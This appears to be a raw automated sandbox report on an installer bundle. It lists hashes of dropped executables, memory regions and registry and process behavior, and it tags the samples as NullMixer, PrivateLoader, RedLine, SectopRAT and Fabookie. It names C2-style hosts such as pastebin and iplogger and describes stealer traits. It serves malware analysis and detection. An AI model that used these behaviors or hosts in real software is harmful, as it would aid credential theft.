C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/2352-183-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1964-182-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2160-181-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1528-193-0x0000000000390000-0x0000000000400000-memory.dmp

memory/1320-192-0x0000000000020000-0x0000000000092000-memory.dmp

memory/2436-191-0x0000000000F00000-0x0000000000F70000-memory.dmp

memory/2964-149-0x0000000001200000-0x0000000001208000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QURGKV1BLVSU6TPY56V.temp

MD5 d54a06bc432f97ef572d5736b224ccd4
SHA1 498ba77b33bad2fa6148080e4b0fb334381348d1
SHA256 2093a640c33ad1575985fafafeabae46c1da8b905aa341d125da8f70069b7d5a
SHA512 bc883edc62b2daec082dfd58d72fc2cc3b3b45e92343d2c8f721f0dc69aa991640a55bad96c7eb810268469f93cf07bda02cc94333a9088ad0f48fc084dfd679

memory/2796-196-0x00000000002C0000-0x00000000002D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-O3K3C.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-O3K3C.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1964-121-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe

MD5 8b6f3a6e8d9797093a78f0b85da4a1fc
SHA1 2f8346a3ec3427c5a7681d166501f8f42f620b3b
SHA256 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8
SHA512 c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

memory/2796-208-0x0000000000750000-0x0000000000756000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

memory/844-209-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/2072-225-0x00000000026D0000-0x00000000028C0000-memory.dmp

memory/2752-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2752-83-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2752-82-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2752-81-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2752-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2752-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/1704-236-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2536-251-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2536-249-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2536-248-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2536-247-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2536-245-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2536-243-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2536-241-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1704-238-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1704-235-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2752-260-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2752-259-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2752-258-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2752-256-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2752-253-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2752-252-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1704-234-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1704-232-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1704-230-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1704-228-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1704-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1544-270-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1544-273-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1544-271-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1544-269-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1544-267-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1544-265-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1544-263-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2260-287-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/2352-289-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1092-288-0x0000000000400000-0x0000000002F22000-memory.dmp

memory/2328-290-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2072-297-0x0000000002BD0000-0x0000000002C75000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab620D.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"

C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

72s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3276 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe
PID 3276 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe
PID 3276 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe
PID 3036 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 4404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 4404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
